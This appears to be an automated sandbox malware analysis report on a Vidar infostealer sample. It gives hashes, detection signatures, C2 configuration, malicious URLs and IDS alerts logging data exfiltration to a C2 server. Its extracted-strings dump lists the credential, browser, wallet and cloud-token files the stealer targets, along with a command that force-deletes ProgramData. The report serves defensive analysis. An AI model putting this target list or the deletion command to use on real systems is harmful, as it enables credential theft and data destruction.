Windows Analysis Report
25xTHcaF7V.exe

Overview

General Information

Sample name: 25xTHcaF7V.exe
renamed because original name is a hash value
Original sample name: e7c964e5bd52da0b4ff1e6543608cf27.exe
Analysis ID: 1598005
MD5: e7c964e5bd52da0b4ff1e6543608cf27
SHA1: b369051de7f7bdf58411fb604eef85507965abf2
SHA256: 33cab7cd9069c761a907a2498c2d496da5e9332412b13472710e774ca80c4b48
Tags: exeuser-abuse_ch
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: https://tlfiyat.shop/X5 Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/W; Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/s Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/s5i. Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/O Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/ Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/k Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop# Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/;8 Avira URL Cloud: Label: malware
Source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: 25xTHcaF7V.exe Virustotal: Detection: 31% Perma Link
Source: 25xTHcaF7V.exe ReversingLabs: Detection: 31%
Source: Submited Sample Integrated Neural Analysis Model: Matched 84.2% probability
Source: 25xTHcaF7V.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49945 version: TLS 1.2
Source: 25xTHcaF7V.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: Surrey.com, 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: cryptosetup.pdbGCTL source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: cryptosetup.pdb source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: 1.pdb\ source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 1.pdb source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: {"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWAR
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009ADC54
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA087
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA1E2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 13_2_009AE472
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 13_2_009BA570
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B66DC FindFirstFileW,FindNextFileW,FindClose, 13_2_009B66DC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097C622 FindFirstFileExW, 13_2_0097C622
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 13_2_009B73D4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B7333 FindFirstFileW,FindClose, 13_2_009B7333
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009AD921
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 5MB later: 31MB

Networking

barindex
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.12:49722 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.12:49724 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49726 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49727 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49758 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49776 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49750 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.12:49724
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49756 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49756 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49757 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49757 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49792 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49792 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.12:49725
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49800 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49800 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49835 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49835 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49816 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49816 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49821 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49821 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49874 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49874 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49924 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49943 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49962 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49954 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49949 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49930 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49948 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49944 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49942 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49946 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49947 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49951 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49958 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49952 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49953 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49959 -> 5.75.209.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic TCP traffic: 192.168.2.12:49731 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 2.22.242.105 2.22.242.105
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 18.238.49.74 18.238.49.74
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BD889 InternetReadFile,SetEvent,GetLastError,SetEvent, 13_2_009BD889
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
